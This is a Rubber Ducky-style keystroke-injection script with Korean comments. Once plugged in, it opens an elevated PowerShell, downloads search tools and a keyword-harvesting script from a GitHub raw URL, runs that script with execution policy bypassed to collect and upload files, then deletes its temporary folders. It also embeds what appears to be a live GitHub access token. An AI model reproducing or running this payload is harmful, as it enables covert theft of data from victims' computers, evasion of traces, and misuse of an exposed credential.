REM [1] PowerShell 관리자 권한으로 실행
DELAY 1500
GUI r
DELAY 300
STRING powershell
DELAY 150
CTRL SHIFT ENTER
DELAY 1200
ALT y
DELAY 800

REM [2] GitHub에서 스캐너 툴 다운로드 (temp_날짜시간 폴더)
ALTSTRING $ErrorActionPreference="Stop"; $baseUrl="https://raw.githubusercontent.com/1-3-1/25HOTEL/main/P11Scanner5um1n"; $timestamp=(Get-Date).ToString('yyyyMMdd_HHmmss'); $targetFolder=Join-Path "$env:USERPROFILE\Desktop" ("tempsumin_$timestamp"); if(-not(Test-Path $targetFolder)){ New-Item -ItemType Directory -Force -Path $targetFolder | Out-Null; Write-Host "[+] Folder created: $targetFolder" }; $files=@("everything.exe","es.exe","keywords.txt","KeywordSearchAndCopy5umn1_v1.2.ps1"); foreach($file in $files){ $url="$baseUrl/$file"; $dest=Join-Path $targetFolder $file; Write-Host "[>] Downloading: $file ..."; try{ Invoke-WebRequest -Uri $url -OutFile $dest -UseBasicParsing; Write-Host "[OK] Downloaded: $file -> $dest" } catch { Write-Host "[ERR] Failed to download: $file"; Write-Host "Reason: $($_.Exception.Message)" } }; Write-Host "`n[✓] All files downloaded (if no errors)."; Write-Host "[*] Saved to: $targetFolder"; Set-Location $targetFolder; Write-Host "[>] Current path changed to: $(Get-Location)"
ENTER
DELAY 1000


REM [3] Everything 관리자 권한으로 실행
ALTSTRING Start-Process -FilePath ".\Everything.exe" -Verb RunAs -WindowStyle Minimized
ENTER
DELAY 5000
REM ↑ Everything 인덱싱을 위해 실제 5초(10000ms) 대기


REM [4] Git 키 값 넣기
ALTSTRING "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" | Out-File -FilePath "sumin_gitkey.txt" -Encoding utf8
ENTER

REM [5] 수집 및 업로드
ALTSTRING powershell -ExecutionPolicy Bypass -NoExit -File ".\KeywordSearchAndCopy5umn1_v1.2.ps1"
ENTER

REM [6] 새파워쉘 열어서 폴더 지우기
DELAY 30000
ALT F4


REM [1] PowerShell 관리자 권한으로 실행
DELAY 1500
GUI r
DELAY 300
STRING powershell
DELAY 150
CTRL SHIFT ENTER
DELAY 1200
ALT y
DELAY 800

REM [2] GitHub에서 스캐너 툴 다운로드 (temp_날짜시간 폴더)
ALTSTRING
Get-ChildItem "$env:USERPROFILE\Desktop" -Directory -Filter "tempsumin_*" | Remove-Item -Recurse -Force
ENTER
DELAY 1000
ALT F4
